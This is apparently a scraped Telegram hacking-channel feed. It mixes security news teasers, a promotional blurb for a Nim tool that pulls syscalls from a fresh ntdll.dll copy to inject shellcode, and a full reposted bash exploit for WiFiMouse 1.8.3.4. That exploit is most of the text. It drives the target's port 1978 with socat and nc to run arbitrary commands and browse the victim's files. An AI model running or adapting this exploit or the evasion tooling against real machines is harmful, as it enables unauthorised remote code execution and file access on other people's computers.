Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Get fresh Syscalls (https://www.kitploit.com/search/label/Syscalls) from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers (https://github.com/ajpc500/NimlineWhispers) and NimlineWhispers2 (https://github.com/ajpc500/NimlineWhispers2) by @ajpc500 (https://twitter.com/ajpc500) or ParallelNimcalls (https://github.com/frkngksl/ParallelNimcalls).The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows (https://www.kitploit.com/search/label/Windows) versions.To compile the shellcode execution template run the following:nim c -d:release ShellcodeInject.nim
The result should look like this:

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Ransomware: The Latest Chapter

As ransomware attacks continue to evolve, beyond using security best practices organizations can build resiliency with extended detection and response solutions and fast response times to shut down attacks.
What is a Security Operations Center (SOC)

A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team…Continue reading on Medium »
Read more...
Easy way to Install waybackurls on Kali Linux.

Fetch known URLs from the Wayback Machine for domains.Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WiFiMouse 1.8.3.4 Remote Code Execution

https://3.bp.blogspot.com/-bZ42fSZSr3k/WWlvHn9HijI/AAAAAAAAILg/Inc3JSbnqMk2Mr3Ts5OXFhitf0RPA2_cwCLcBGAs/s1600/h140.png
WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.

SHA-256 | dcee2f3f5c3ab2a8df29abd14197cd5010f6cb612ffbe07e1a7870f3004c0108

Download
# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10

#!/bin/bash
printf "
WiFiMouse / MouseServer 1.8.3.4 Exploit

by FEBIN

"

printf "[*] Enter the Target IP Address: "
read TARGET
rce(){
printf "[*] Enter the Command to execute on the Target: "
read CMD

sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done
}

printf "
[1] Remote Command Execution
[2] Directory Listing

"
printf "Enter Your Choice (1 or 2) : "
read CHOICE

if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist

else
echo "[-] Invalid Choice!"
fi


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video